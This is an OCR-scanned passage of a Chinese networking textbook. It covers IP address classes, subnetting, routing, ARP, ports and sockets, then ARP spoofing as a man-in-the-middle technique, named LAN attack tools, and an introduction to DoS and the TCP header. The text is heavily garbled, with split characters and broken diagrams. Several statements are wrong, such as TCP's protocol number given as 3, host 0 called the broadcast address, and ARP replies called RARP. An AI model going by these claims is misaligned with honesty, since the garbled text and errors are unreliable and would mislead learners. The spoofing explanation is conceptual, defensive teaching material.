含 着 足够 的 信息 以 唯一 地 标志 一 个 网 络 和 该 网 络 中 的 特定 主机 。 

一 个 IP 地 址 由 一 个 网 络 部 分 和 一 个 主机 部 分 组 成 ,但 在 每 个 IP 地 址 中 它们 的 格式 是 
不 同 的 。 用 来 标志 网 络 和 主机 的 地 址 位 数 将 根据 地 址 的 “类 型 ?而 变 ,A 类 、B 类 和 C 类 是 三 
个 主要 的 地 址 类 型 。 通 过 检查 一 个 地 址 的 前 几 位 ,IP 软件 很 快 就 可 以 确定 地 址 的 类 别 及 其 
结构 。IP 遵循 以 下 规则 确定 地 址 的 类 别 。 

@ 如 果 IP 地 址 的 第 1 位 是 0, 它 就 是 A 类 网 络 的 地 址 。A 类 地 址 的 第 1 位 标志 其 地 
址 类 别 ,接着 的 7 位 标志 其 网 络 。 最 后 的 24 位 标志 主机 。A 类 网 络 的 编号 小 于 128, 但 每 
个 A 类 网 络 可 以 包含 数 百 万 台 主 机 。 

@ 如 果 该 地 址 的 前 2 位 是 10, 它 就 是 B 类 网 络 地 址 。 在 B 类 地 址 中 ,前 2 位 标志 地 址 
类 别 ,接着 的 14 位 标志 网 络 ,最 后 16 位 标志 主机 。 可 以 有 数 千 个 B 类 网 络 编号 ,每 个 了 B 类 
网 络 可 以 包含 数 千 台 主 机 。 

@ 如 果 该 地 址 的 前 3 位 是 110, 它 就 是 C 类 网 络 地 址 。 在 C 类 地 址 中 ,前 3 位 是 类 标 
志 符 ,接着 的 21 位 是 网 络 地 址 ,最 后 8 位 标志 主机 。 有 数 百 万 个 C 类 网 络 编号 ,而 每 个 C 
类 网 络 包 括 的 主机 数量 少 于 254 台 。 

@ 如 果 该 地 址 的 前 3 位 是 111, 它 就 是 一 个 专门 保留 的 地 址 。 这 类 地 址 有 时 称 为 D 类 
地 址 ,实际 上 它 并 不 指向 特定 的 网 络 , 目 前 这 一 范围 内 的 编号 赋予 给 广播 地 址 。 广 播 地 址 用 
来 一 次 寻 址 一 组 计算 机 , 它 标 志 共 享 同一 协议 的 一 组 计算 机 ,这 与 共享 同一 网 络 的 一 组 计算 
机 恰好 相反 。 

IP 地 址 通常 写成 用 点 (英语 句号 ) 分 隔 开 的 4 个 十 进 制 数 ,其 中 每 一 部 分 的 数字 值 在 0 
到 255( 一 个 字 节 可 表达 的 十 进 制 值 ) 之 间 。 因 为 标志 类 的 位 和 网 络 地 址 的 位 是 连 在 一 起 
的 ,因而 可 以 把 IP 地 址 看 成 是 由 所 有 网 络 地 址 字 节 和 所 有 主机 地 址 字 节 两 部 分 组 成 。 第 1 
个 字 节 的 值 的 含义 如 下 : 

。 如 果 值 小 于 128, 则 表示 A 类 地 址 ,其 第 一 个 字 节 就 是 网 络 号 , 紧 接 着 的 三 个 字 节 是 

主机 地 址 。 
。 值 在 128 到 191 之 间 , 表 示 B 类 地 址 ,前 二 个 字 节 标志 网 络 ,后 二 个 字 节 标志 主机 。 
。 值 在 192 到 223 之 间 , 表 示 C 类 地 址 ,前 三 个 字 节 是 网 络 地 址 ,最 后 一 个 字 节 是 主 
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机 号 。 
。 值 大 于 224, 表 示 该 地 址 是 保留 地 址 。 
需要 提醒 的 是 ,并 不 是 所 有 的 网 络 地 址 或 主机 地 址 都 是 可 用 的 : 
。 第 一 个 字 节 大 于 223 的 地 址 都 是 保留 地 址 。 
。 在 A 类 地 址 中 ,有 两 个 地 址 0 和 127 也 是 留 作 专用 地 址 ,网络 0 是 “默认 路 由 ”, 网 络 
127 是 * 回 送 地 址 ”。 默 认 路 由 用 来 简化 IP 必须 处 理 的 路 由 选择 信息 , 回 送 地 址 由 于 
允许 本 地 主机 与 远程 主机 以 同样 的 方式 寻 址 而 简化 了 网 络 应 用 程序 。 在 配置 主机 
时 使 用 这 些 专用 网 络 地 址 。 
在 所 有 的 网 络 中 主机 号 0 和 255 也 是 保留 的 。 所 有 主机 位 都 置 成 0 的 IP 地 址 用 以 
标志 网 络 本 身 。 主 机 号 为 0 的 IP 地 址 是 广播 地 址 , 即 发 送 到 该 地 址 的 数据 传送 到 
网 络 上 的 每 一 台 主 机 。 
由 于 合法 IP 地 址 的 缺乏 ,设置 了 一 定 的 保留 地 址 ,这 些 地 址 不 被 正式 分 配给 任何 主 
机 ,而 且 也 不 应 该 被 使 用 在 自己 网 络 的 外 部 机 构 。 如 : A 类 网 10; B 类 网 172.16 直 
到 172. 31; C 类 网 192. 168. 0 直到 192. 168. 255。 

一 般 将 IP 地 址 称 为 主机 地 址 ,但 实际 上 IP 地 址 是 赋予 网 络 接口 的 而 并 不 是 赋予 计算 
机 系统 的 。 


11.23 子 网 


将 主机 地 址 位 用 作 附 加 的 网 络 地 址 位 ,就 可 以 局 部 地 修改 IP 地 址 的 标准 结构 。 其 实质 
就 是 移动 网 络 地址 位 和 主机 地 址 之 间 的 "分 解 线 ”, 从 而 创建 附加 的 网 络 ,但 却 减少 了 每 个 网 
络 的 主机 数量 。 这 种 新 分 配 的 网 络 位 就 可 在 一 个 大 型 网 络 内 定义 一 个 网 络 , 称 为 子 网 
(subnet) 。 

为 了 解决 拓扑 上 的 或 结构 上 的 问题 ,一 些 结构 决定 组 建 子 网 。 构 建 子 网 可 以 分 散 对 主 
机 寻 址 的 管理 。 

建立 子 网 还 可 解决 硬件 差异 和 距离 限制 问题 。IP 路 由 器 可 以 将 不 同 的 物理 网 络 连接 
在 一 起 ,但 这 只 有 当 每 个 物理 网 络 拥有 唯一 的 网 络 地 址 时 才 可 以 。 构 建 子 网 是 将 一 个 单独 
的 网 络 地 址 分 成 很 多 唯一 的 子 网 地 址 ,因此 每 个 物理 网 络 可 以 拥有 唯一 的 地 址 。 

在 IP 地址 上 使 用 一 个 位 掩 码 , 即 子 网 掩 码 (subnet mask) 就 可 以 定义 一 个 子 网 。 如 果 
掩 码 位 是 1 ,那么 其 地 址 中 相应 的 位 为 网 络 位 ; 如 果 掩 码 位 是 0, 则 该 位 就 属于 主机 地 址 
部 分 。 子 网 只 能 在 本 地 识别 ,对 于 Internet 的 其 他 部 分 ,其 地 址 仍然 被 看 成 是 标准 的 全 
地 址 。 

例如 ,与 标准 B 类 地 址 相关 的 子 网 掩 码 是 255. 255. 0.0。 最 通用 的 子 网 掩 码 是 通过 一 
个 附加 字 节 来 扩充 一 个 B 类 地 址 的 网 络 部 分 ,这 样 该 子 网 就 是 255. 255. 255. 0。 前 三 个 字 
节 的 所 有 位 都 是 1, 而 最 后 一 个 字 节 的 所 有 位 都 是 0; 前 两 个 字 节 定义 B 类 网 络 ,第 三 个 字 
节 定 义 子 网 地 址 ,第 四 个 字 节 定义 子 网 上 的 主机 。 

很 多 网 络 管理 员 经 常 使 用 面向 字 节 的 掩 码 , 因 为 易于 阅读 和 理解 。 然 而 ,不 要 求 都 以 字 
节 边 界 来 定义 子 网 , 子 网 掩 码 可 以 面向 位 ,这 样 就 能 适用 于 任何 地 址 类 。 例 如 ,利用 掩 码 
255. 255. 255. 192 ,一 个 小 型 单位 就 可 将 C 类 地 址 分 成 4 个 子 网 。 这 个 掩 码 将 一 个 C 类 地 
址 的 第 四 个 字 节 的 前 两 个 位 定义 为 该 地 址 的 子 网 部 分 。 同 一 个 掩 码 如 果 用 于 B 类 地 址 ,就 
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可 构建 1000 多 个 子 网 ,因为 有 10 个 位 ,包括 前 三 个 字 节 的 全 部 和 第 四 字 节 的 2 位 ,都 用 来 
定义 子 网 。 如 表 11. 5 所 示 ,列举 了 基于 不 同 网 络 地 址 的 各 种 子 网 掩 码 的 作用 。 


表 11.5 子 网 掩 码 的 作用 


IP 地 址 子 网 掩 码 说 明 
128. 66. 12. 1 255. 255. 255. 0 子 网 128. 66. 12.0 上 的 主机 1 
130. 97. 16. 132 255. 255. 255. 192 子 网 130. 97. 16. 128 上 的 主机 4 
192. 178. 16. 66 255. 255. 255. 192 子 网 192. 178. 16. 64 上 的 主机 2 
132. 90. 132.5 255. 255. 240. 0 子 网 132. 90. 128. 0 上 的 主机 4. 5 
18. 20. 16. 91 255. 255. 0.0 子 网 18. 20. 0.0 上 的 主机 16. 91 


11.24 ”Intemet 的 路 由 结构 


路 由 选择 模型 以 各 自治 系统 的 相互 平等 为 基础 , 称 为 路 由 域 (Routing Domain)。 注 : 
自治 系统 AS, 是 一 组 通过 统一 的 路 由 政策 或 路 由 协议 互相 
交换 路 由 信息 的 网 络 。 

路 由 域 使 用 边界 网 关 协 议 (BGP) 或 外 部 网 关 协 议 |” 路 由 选 择 域 并 | 路 由 选择 域 
(EGP) 来 与 其 他 域 交 换 路 由 信息 ,每 个 路 由 域 各 自 处 理 从 其 
他 域 接收 来 的 信息 。 

这 种 结构 的 特点 是 扩充 性 比较 好 。 如 图 11. 8 所 示 , 用 
三 个 相交 的 圆 表示 这 一 模型 ,每 个 圆 就 是 一 个 路 由 域 ,其 重 
合 区 就 是 边界 区 ,路 由 信息 在 这 里 共享 。 这些 域 共享 路 由 信 
息 , 但 并 不 依靠 任何 一 个 系统 去 提供 所 有 的 路 由 选择 信息 。 图 11.8 路 由 选择 域 
无 论 路 由 信息 是 如 何 得 来 的 , 它 最 终 总 会 到 达 本 地 网 关 。 


11.25 路 由 器 


TCP/IP 的 开放 性 为 各 网 络 间 的 信息 集成 提供 了 可 能 。 但 对 于 采用 不 同 技术 的 各 个 网 
络 ,如 何在 硬件 上 将 其 连接 起 来 是 实现 TCP/IP 的 基本 保障 。 路 由 器 在 网 络 互 联 上 起 着 至 
关 重 要 的 作用 ,通过 路 由 器 设备 可 以 把 不 同 的 网 络 连接 成 一 个 范围 更 大 的 网 络 。 

路 由 器 是 一 种 比较 成 熟 的 网 络 互联 技术 。 它 不 仅 能 够 很 好 地 实现 路 由 、 协 议 转换 功 
能 ,而 且 在 网 络 安全 、 网 络 管理 方面 也 起 着 重要 的 作用 。 路 由 器 的 主要 功能 包括 以 下 几 
方面 : 

。 连接 不 同 的 网 络 。 

。 协议 转换 和 路 由 选择 功能 。 

。 网 络 管理 和 安全 。 


11.26 路 由 表 


网 关 要 在 网 络 之 间 为 数据 选择 路 由 ,其 他 所 有 的 网 络 设备 、 主 机 也 和 网 关 一 样 必须 做 出 
路 由 选择 的 决定 。 主 机 选择 路 由 的 策略 有 以 下 两 种 : 
@ 如果 目 的 主机 在 本 地 网 络 上 ,就 将 数据 传 给 目的 主机 。 
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@ 如 果 目 的 主机 在 远程 网 络 上 ,就 将 数据 转发 给 本 地 网 关 。 

IP 模块 根据 IP 地 址 的 高 位 来 确定 目的 IP 地 址 的 网 络 部 分 。 如 果 目 的 网 络 是 本 地 网 
络 , 就 可 在 目的 地 址 上 使 用 本 地 子 网 掩 码 。 

确定 目的 网 络 后 ,IP 模块 就 在 本 地 路 由 表 中 查找 该 网 络 , 各 分 组 报 文 就 流向 路 由 表 所 
指定 的 目的 地 。 路 由 表 (routing table) 可 由 系统 管理 员 或 路 由 协议 建立 。 

利用 netstat-nr 命令 可 显示 路 由 表 的 内 容 , 如 图 11.9 所 示 。 


ETC\WINDOWS\system32\cmd.exe 攻 


ic: Docunents and Settings hdninistrator: 


Netmask 


9-B-B 
8 


tent Routes: 


ttings Adninistrator>, 


图 11.9 Netstat 命令 


11.27 地 址 转换 


IP 地 址 和 路 由 表 将 数据 报 引 向 一 个 特定 的 物理 网 络 , 但 是 当 数 据 通过 网 络 传输 时 , 必 
须 遵从 该 网 络 使 用 的 物理 层 协 议 。 作 为 TCPVIP 网 络 底层 的 物理 网 并 不 能 进行 IP 寻 址 , 它 
有 它 自己 的 寻 址 方案 ,有 多 少 种 物理 网 络 就 有 多 少 种 寻 址 方案 。 网 络 访问 协议 的 一 个 任务 
就 是 将 IP 地 址 映射 为 物理 网 络 地 址 。 

IP 地 址 与 以 太 网 地 址 之 间 的 关系 就 是 这 种 网 络 接口 层 功 能 的 最 普通 例子 ,执行 这 一 功 
能 的 协议 是 地 址 转换 协议 (ARP) 。 

ARP 软件 维护 着 一 个 IP 地 址 和 以 太 网 地 址 的 转换 表 , 它 是 动态 构建 的 。 当 ARP 接收 
到 转换 IP 地 址 的 请 求 时 ,就 在 其 表 中 查看 该 地 址 ,如 果 找 到 该 地 址 ,就 将 该 以 太 网 地 址 返回 
给 请 求 软件 ; 如 果 在 该 表 中 找 不 到 该 地 址 ,ARP 就 发 出 一 个 广播 分 组 报 文 给 以 太 网 上 的 每 
个 主机 。 该 分 组 报 文 内 包含 着 需要 转换 成 以 太 网 地 址 的 IP 地 址 ,如果 有 一 个 接收 主机 识别 
出 该 IP 地 址 就 是 它 自 己 , 便 将 它 的 以 太 网 地 址 发 回 请 求 软件 ,这 一 响应 内 容 随即 存储 在 该 
ARP 表 中 。 

ARP 命令 可 显示 ARP 表 的 内 容 。 利 用 arp-a 命令 可 显示 整个 ARP 表 的 内 容 , 如 
图 11. 10 所 示 。 
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INDOWS\system32\cmd.exe 有 =| 口 | 之 | 


Interface: 
Internet fl 
17 2 


C:\Documents and Settings\hdministrator>。 


图 11.10 ARP 命令 


11.28 协议 .端口 和 套 接 字 接 口 

- 旦 数据 在 网 络 上 传送 并 到 达 一 台 特 定 的 主机 ,就 必须 将 它 交 给 相应 的 用 户 或 进程 。 
由 于 数据 在 TCP/IP 的 各 层 之 间 上 下 传送 ,因此 就 需要 一 个 机 构 能 将 数据 传送 到 每 一 层 的 
相应 协议 。 系 统 必须 能 够 将 来 自 多 个 应 用 程序 的 数据 组 合 到 少数 几 个 传输 协议 中 ,再 将 这 
些 传输 协议 传 给 网 间 协 议 。 所 以 IP 使 用 协议 号 去 标志 传输 协议 ,而 传输 协议 使 用 端口 号 去 
标志 应 用 程序 。 


1. 协议 号 

协议 号 是 数据 报 报 头 的 第 三 个 字 中 的 一 个 字 节 ,其 值 标 志 IP 上 必须 传送 数据 的 那 一 层 
协议 。 在 UNIX 系统 中 ,协议 号 定义 在 /etc/protocols 文件 中 , 它 是 一 个 简单 的 表格 ,含有 协 
议 名 及 其 协议 号 。 例 如 : 


% cat /etc/protocols 
ip 0 IP 

icmp 1 ICMP 
tcp 3 TCP 

udp 17 UDP 


这 个 表 的 含义 是 , 当 一 个 数据 报到 达 , 并 且 它 的 目的 地 址 与 本 地 IP 地 址 符合 时 ,IP 层 
就 必须 将 该 数据 报 传送 到 它 上 层 的 一 个 运输 层 协议 。 为 了 决定 哪个 协议 接收 该 数据 报 ,IP 
就 查看 该 数据 报 的 协议 号 。 利 用 此 表 可 以 看 出 ,如 果 协 议 号 是 3,IP 就 将 该 数据 报 传送 给 
TCP; 如 果 协 议 是 17,IP 就 将 它 传送 给 UDP。 

2. 端口 号 

IP 将 进来 的 数据 发 送 给 传输 协议 后 ,该 传输 协议 就 将 它 传送 到 相应 的 应 用 程序 进程 
中 。 应 用 程序 的 进程 (又 称 网 络 服务 ) 是 用 端口 号 标志 的 , 它 是 一 个 16 位 的 值 。 标 志 数 据 发 
送 进程 的 “ 源 端 口号 ”和 标志 数据 接收 进程 的 “目的 端口 号 ”都 包含 在 每 个 TCP 段 和 UDP 分 
组 的 第 一 个 报头 字 中 。 
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在 UNIX 系统 中 ,端口 号 在 /etc/services 文件 中 定义 。 网 络 应 用 程序 的 数量 要 比 该 表 
中 所 示 的 运输 层 协 议 数 多 得 多 。 低 于 256 的 端口 号 是 留 给 “知名 服务 "(TFP 和 Telnet 等 ) 
的 ,从 256 到 1024 的 端口 号 用 于 UNIX 的 专用 服务 。 

下 面 列 出 了 部 分 /etc/services 文件 。 


Peanut$ cat /etc/services 


echo 7/udp 
echo 7/tcp 
systat 11/tcp 


netstat 15/tcp 
ftp- data 20/tcp 


将 该 表 与 /etc/protocols 表 结 合 在 一 起 ,就 可 提供 将 数据 传送 到 相应 的 应 用 程序 所 需 的 
全 部 信息 。 数 据 报 根据 其 报头 第 5 个 字 内 的 目的 地 址 到 达 其 目的 地 ,IP 使 用 该 数据 报 报头 
第 3 个 字 内 的 协议 号 将 数据 传输 给 适当 的 运输 层 协议 。 到 达 该 传输 协议 的 数据 的 第 一 个 字 
内 含有 目的 端口 号 , 它 会 告诉 传输 协议 将 数据 传送 到 特定 的 应 用 程序 。 


3. 套 接 字 接 口 


一 个 IP 地 址 和 一 个 端口 号 的 组 合 称 为 一 个 套 接 字 接口 (Socket) ,一 个 套 接 字 接 口 可 以 
唯一 地 标志 整个 Internet 中 的 一 个 网 络 进程 。 套 接 字 接口 是 IP 地 址 和 端口 号 的 组 合 , 一 对 
套 接 字 接口 (一 个 用 于 接收 , 另 一 个 用 于 发 送 ) 可 定义 面向 连接 的 协议 (如 TCP) 的 一 次 
连接 。 


11.3 ARP 协议 的 缺陷 及 其 在 操作 系统 中 的 表现 


ARP 协议 在 以 太 网 环境 中 得 到 了 广泛 的 应 用 ,是 以 太 网 中 计算 机 之 间 进 行 通信 必须 使 
用 的 协议 之 一 ,由 于 ARP 协议 在 设计 时 并 没有 充分 考虑 到 网 络 安全 的 问题 ,所 以 现在 利用 
ARP 协议 的 缺陷 的 黑客 工具 也 越 来 越 多 。 本 节 闸 述 了 ARP 协议 的 工作 原理 及 缺陷 ,以 及 
ARP 协议 的 缺陷 在 常见 操作 系统 中 的 表现 形式 。 


11.31 网 络 设备 的 通信 过 程 及 ARP 协议 的 工作 原理 


在 以 太 网 中 ,每 一 个 网 络 接口 都 有 了 唯一 的 硬件 地 址 , 即 网 卡 的 MAC 地址 。MAC 地 址 
共有 48 比特 ,用 来 表示 网 络 中 的 每 一 个 设备 。 一 般 来 说 每 一 块 网 卡 上 的 MAC 地 址 都 是 不 
同 的 。 在 MAC 地 址 和 IP 地 址 间 使 用 ARP 和 RARP 协议 进行 相互 转换 。 

在 正常 的 情况 下 ,一 个 网 络 接口 通常 只 响应 以 下 两 种 数据 帧 。 

。 与 本 MAC 地 址 相 匹配 的 数据 帧 。 

。 发 向 所 有 计算 机 的 广播 数据 帧 。 

在 一 个 实际 的 系统 中 ,数据 的 收发 是 由 网 卡 来 完成 的 。 网 卡 接 收 到 传输 来 的 数据 ,网 卡 
内 的 芯片 程序 接收 数据 帧 中 目的 地 的 MAC 地 址 ,根据 计算 机 上 网 卡 驱动 程序 设置 的 接收 
模式 来 判断 该 不 该 接收 ,如 果 认 为 应 该 接收 就 在 接收 后 产生 一 个 中 断 信号 通知 CPU, 如 果 
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认为 不 应 该 接收 就 抛弃 此 数据 ,CPU 收 到 中 断 信 号 产生 一 个 CPU 中 断 ,操作 系统 就 根据 网 
卡 驱动 程序 设置 的 网 卡 中 断 程序 地 址 调用 驱动 程序 接收 数据 ,然后 将 接收 到 的 数据 放 入 信 
号 堆栈 让 操作 系统 处 理 。 而 对 于 网 卡 来 说 一 般 有 四 种 接收 模式 ,如 表 11. 6 所 示 。 


表 11.6 网 卡 的 四 种 接收 模式 


方式 解 释 

广播 方式 该 模式 下 的 网 卡 能 够 接收 网 络 中 的 广播 信息 

组 播 方式 该 模式 下 的 网 卡 能 够 接收 组 播 数据 

直接 方式 该 模式 下 ,只 有 目的 网 卡 才能 接收 数据 

混杂 模式 该 模式 下 的 网 卡 能 够 接收 一 切 通 过 它 的 数据 ,而 不 管 该 数据 是 否 是 传 给 它 的 


假设 局 域 网 中 A 计算 机 和 B 计 算 机 之 间 需 要 进行 通信 ,首先 A 计算 机 需要 知道 BB 计 
算 机 的 MAC 地 址 ,A 计算 机 获得 B 计 算 机 的 MAC 地 址 需要 向 B 计算 机 发 送 一 个 ARP 
协议 的 广播 数据 包 ,数据 包 的 内 容 是 请 求 获得 B 计 算 机 的 MAC 地 址 , 当 B 计 算 机 收 到 这 
个 数据 包 是 查询 B 计算 机 的 MAC 地 址 时 ,B 计算 机 就 会 向 A 计算 机 发 送 一 个 RARP 协 
议 的 数据 包 告 诉 A 计算 机 自己 的 MAC 地 址 ,这 样 A 计算 机 就 可 以 和 B 计算 机 进行 通 
信 了 。 


11.32 ARP 协 议 的 缺陷 及 其 在 常见 操作 系统 中 的 表现 


ARP 协议 的 缺陷 在 于 ARP 协议 以 及 RARP 协议 都 没有 对 数据 的 发 送 方 和 接收 方 做 
任何 的 认证 ,这 样 在 网 络 中 可 能 会 存在 伪造 的 ARP 和 RARP 数据 包 , 导 致 中 间 人 (Man In 
The Middle) 攻 击 的 可 能 性 ,具体 的 做 法 是 假设 C 计算 机 要 作为 中 间 人 监听 A 计算 机 和 B 
计算 机 之 间 的 通信 ,C 计算 机 可 以 先 发 出 一 个 RARP 数据 包 告 诉 A 计算 机 它 是 B 计算 机 ， 
然后 再 发 出 一 个 RARP 数据 包 告 诉 B 计 算 机 它 是 A 计算 机 。 这 样 A 计算 机 和 B 计算 机 之 
间 的 通信 就 要 经 过 C 计算 机 。 当 然 ,C 计算 机 还 要 负责 转发 它 收 到 的 网 络 数据 包 , 这 样 ,A 
计算 机 和 B 计算 机 之 间 的 通信 就 不 至 于 中 断 了 。 

当然 ,ARP 协议 的 缺陷 也 可 以 用 在 黑客 攻击 中 ,目前 已 经 出 现 了 几 种 这 样 的 黑客 攻击 
工具 ,如 局 域 网 杀手 、 网 络 剪刀 手 和 流光 等 。 

ARP 协议 的 缺陷 在 不 同 的 操作 系统 中 的 表现 形式 是 不 一 样 的 ,在 Linux 操作 系统 中 当 
收 到 一 个 RARP 的 数据 包 时 ,Linux 操作 系统 会 向 网 络 中 发 送 一 个 ARP 协议 的 数据 包 来 
进行 核实 ,这 在 一 定 程度 上 解决 了 ARP 协议 存在 的 缺陷 ,但 并 没有 从 根本 上 解决 , 当 Linux 
操作 系统 受到 局 域 网 杀手 这 一 类 工具 的 攻击 时 ,网 络 通信 就 会 中 断 。 在 Windows 操作 系统 
中 则 不 进行 核实 .Windows 操作 系统 假定 所 有 的 数据 包 都 是 正常 的 ,Windows 操作 系统 也 
无 法 防御 局 域 网 杀手 这 类 工具 的 攻击 。 相 对 而 言 ,FreeBSD 操作 系统 能 够 较 好 地 防御 局 域 
网 杀手 这 类 工具 的 攻击 , 当 FreeBSD 受到 局 域 网 杀手 的 攻击 时 ,能 够 立即 在 网 络 上 发 送 
RARP 数据 包 进行 修正 。 

综 上 所 述 ,目前 常用 的 以 太 网 通信 依赖 于 ARP、RARP 协议 的 正常 工作 ,而 ARP、 
RARP 协议 的 缺陷 已 经 影响 到 网 络 的 正常 运行 ,要 从 根本 上 解决 此 问题 需要 靠 下 一 代 互 联 
网 网 络 协议 IPv6 ,在 IPv6 协议 中 已 经 取消 了 ARP、RARP 协议 ,取而代之 的 是 ICMPv6 协 
议 ,ICMPv6 协议 充分 考虑 到 了 ARP 以 及 RARP 协议 存在 的 缺陷 ,并 在 认证 鉴别 上 也 做 了 
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进一步 的 考虑 。 在 当前 的 以 太 网 中 可 以 考虑 采用 静态 的 ARP IP 地 址 之 间 的 映射 关系 ,这 
已 为 大 多 数 的 网 络 设备 和 操作 系统 所 支持 ,但 是 Windows 操作 系统 除外 , Windows 系列 操 
作 系 统 中 只 有 Windows 2003 及 其 以 后 的 操作 系统 才能 够 设置 静态 的 ARP 地 址 与 IP 地 址 
之 间 的 映射 关系 。 


11.4 DoS 攻击 原理 以 及 常见 方法 介绍 


DoS(Denial of Service) 是 拒绝 服务 的 缩写 ,这 种 攻击 使 网 站 服务 器 中 充斥 了 大 量 要 求 
回复 的 信息 ,消耗 了 网 络 带 宽 或 系统 资源 ,导致 网 络 或 系统 不 胜 负荷 以 至 于 瘫痪 而 停止 提供 
正常 的 网 络 服务 。 黑 客 不 正当 地 采用 标准 协议 或 连接 方法 ,向 攻击 的 服务 器 发 送 大 量 的 信 
息 ,使 受 攻击 的 服务 器 宕 (down) 机 或 不 能 正常 地 为 用 户 服务 。 


1141 深入 了 解 TCP 协 议 


TCP 协议 是 在 不 可 靠 的 Internet 上 提供 可 靠 的 、 端 到 端的 字 节 流 的 通信 协议 ,在 
RFC793 中 有 正式 定义 ,还 有 一 些 解决 错误 的 文档 包含 在 RFC1122 中 ,RFC1323 则 定义 
TCP 的 功能 扩展 。 在 常见 的 TCP/IP 协议 中 ,IP 层 不 保证 将 数据 报 正确 传送 到 目的 地 ， 
TCP 则 从 本 地 机 器 接收 用 户 的 数据 流 , 将 其 分 成 不 超过 64K 字 节 的 数据 片段 ,将 每 个 数据 
片段 作为 单独 的 IP 数据 包 发 送出 去 ,最 后 在 目的 地 计算 机 中 再 组 合成 完整 的 字 节 流 ,TCP 
协议 必须 保证 可 靠 性 。 发 送 方 和 接收 方 的 TCP 传输 以 数据 段 的 形式 交换 数据 ,一 个 数据 段 
包括 一 个 固定 的 20B, 加 上 可 选 部 分 ,最 后 再 填充 上 数据 ,TCP 协议 从 发 送 方 传 送 一 个 数据 
段 的 时 候 , 还 要 启动 计时 器 , 当 数 据 段 到 达 目 的 地 后 ,接收 方 还 要 发 送 回 一 个 数据 段 , 其 中 有 
一 个 确认 序号 , 它 等 于 希望 收 到 的 下 一 个 数据 段 的 顺序 号 ,如 果 在 确认 信息 到 达 前 超时 了 ， 
发 送 方 会 重新 发 送 这 个 数据 段 。 

TCP 的 数据 头 (header) 非 常 重要 。 因 为 数据 流传 输 的 重要 信息 都 放 在 数据 头 中 ,至 于 
发 送 的 数据 ,只 是 数据 头 附带 上 的 。 客 户 端 和 服务 端的 服务 响应 同 数据 头 中 的 数据 相关 ,两 
端的 信息 交流 和 交换 是 根据 数据 头 中 的 内 容 实施 的 。TCP 数据 头 格式 如 图 11. 11 所 示 。 

在 图 11. 11 中 ,主要 字段 的 含义 如 表 11.7 所 示 。 


表 11.7 TCP 协议 中 字段 含义 


字段 名 称 注 释 
Source Port 本 地 端口 
Destination Port 目标 端口 
Sequence Number 顺序 号 ,32 位 ,在 TCP 流 中 ,每 个 数据 字 节 都 被 编号 
Acknowledgment Number 确认 号 ,确认 号 是 希望 接收 的 字 节 号 ,32 位 
Data offset 表明 TCP 头 包含 多 少 个 32 位 字 , 用 来 确定 头 的 长 度 ,因为 头 
中 可 选 字段 长 度 是 不 定 的 
Reserved 保留 的 6 位 ,现在 没 用 ,都 是 0 


URG(Urgent Pointer field significant) 紧急 指针 ,用 到 的 时 候 值 为 1, 用 来 处 理 避 免 TCP 数据 流 中 断 
ACK(Acknowledgment field significant) 置 1 时 表示 确认 号 (Acknowledgment Number) 为 合法 , 置 0 
的 时 候 表 示 数 据 段 不 包含 确认 信息 ,确认 号 被 忽略 


字段 名 称 
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续 表 
注 释 


PSH(Push Function) 


RST(Reset the connection) 


SYN(Synchronize sequence numbers) 


FIN(No more data from sender) 


Window 


Checksum 


0 


PUSH 标志 的 数据 , 置 1 时 请 求 的 数据 段 在 接收 方 得 到 后 就 
可 直接 送 到 应 用 程序 ,而 不 必 等 到 缓冲 区 满 时 才 传 送 

用 于 复位 因 某 种 原因 引起 出 现 的 错误 连接 ,也 用 来 拒绝 非法 
数据 和 请 求 。 如 果 接 收 到 RST 位 ,通常 发 生 了 某 些 错误 

用 来 建立 连接 ,在 连接 请 求 中 ,SYN 二 1, ACK 二 0, 连接 响应 
时 ,SYN 一 1,ACK 一 1。 即 用 SYN 和 ACK 来 区 分 Connection 
Request 和 Connection Accepted 

用 来 释放 连接 ,表明 发 送 方 已 经 没有 数据 发 送 

共 16 位 ,表示 确认 了 字 节 后 还 可 以 发 送 多 少 字 节 。 可 以 为 0， 
表示 已 经 收 到 包括 确认 号 减 1( 即 已 发 送 所 有 数据 ) 在 内 的 所 
有 数据 段 

16 位 ,用 来 确保 可 靠 性 


2 3 


01234567890123456789012345678901 


Source Port 


一 + 二 -十 -二 -十 -十 -十 -十 十 十- 十- 十 -十 二- 十- 十 -十 -十 -十 -十 -二 -二 -十 -十 +- 二 -二 -十 -十 -十 -二 


一 + 一 二 + 一 二 一 二 一 一 二 一 十 一 十 一 十 一 二 一 十 一 十 一 十 一 二 一 上 一 十 一 十 一 十 一 一 二 一 十 一 十 一 十 一 二 一 十 一 二 一 十 一 十 一 十 一 十 一 | 


一 4 一 + 一 + 一 二 一 一 二 一 二 一 二 一 十 一 二 一 一 一 一 二 一 一 十 一 二 一 十 一 二 一 一 二 一 十 一 十 一 十 一 一 二 一 十 一 二 一 十 一 十 一 二 一 | 


Acknowledgment Number 
A OE EE tt 
Data UlA|P|R|S|F 
Offset | Reserved |RlclslslYli Window 
GIKIHITININ 
+ 一 + 一 一 二 一 + 一 十 一 + 一 + 一 二 一 二 一 二 一 上 一 十 一 一 二 一 一 十 -十 -十 -十 十- 十 -十 -十 -十 -十 -十 -十 -十 -二 -十 一 
Checksum Urgent Pointer 


一 十 -十 十 -十 二 十 -十 -十 二 十 二 十 二 十 十 二 十 -十 十 一 十 -十 -十 -十 -十 二 十 -十 -十 -十 -十 -十 -十 -十 -十 -十 -十 一 
Options Padding 
一 一 十 一 二 一 二 一 十 一 十 一 二 一 于 一 二 一 十 一 一 一 二 一 二 一 二 一 十 一 十 一 二 一 二 一 十 一 十 一 十 一 二 一 二 一 二 一 十 一 十 一 十 一 二 一 二 一 二 一 


SD ED ED A 


Destination Port 


Sequence Number 


data 


11.11 TCP 头 文件 格式 


11.42 服务 器 的 缓冲 区 队列 


服务 器 不 会 在 每 次 接收 到 SYN 请 求 就 立即 同 客 户 端 建立 连接 ,而 是 为 连接 请 求 分 配 
一 个 内 存 空间 ,建立 会 话 , 并 放 到 一 个 等 待 队列 中 。 如 果 这 个 等 待 的 队列 已 经 满 了 ,那么 服 
务 器 就 不 再 为 新 的 连接 分 配 任 何 空 间 , 而 是 直接 丢弃 新 的 请 求 。 如 果 这 样 ,服务 器 就 拒绝 
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服务 。 

如 果 服 务 器 接收 到 一 个 RST 位 信息 ,那么 就 认为 这 是 一 个 有 错误 的 数据 段 , 它 就 会 根 
据 客户 端 IP, 把 这 样 的 连接 从 缓冲 区 队列 (Backlog Queue) 中 清除 掉 。 这 不 仅 对 IP 欺骗 有 
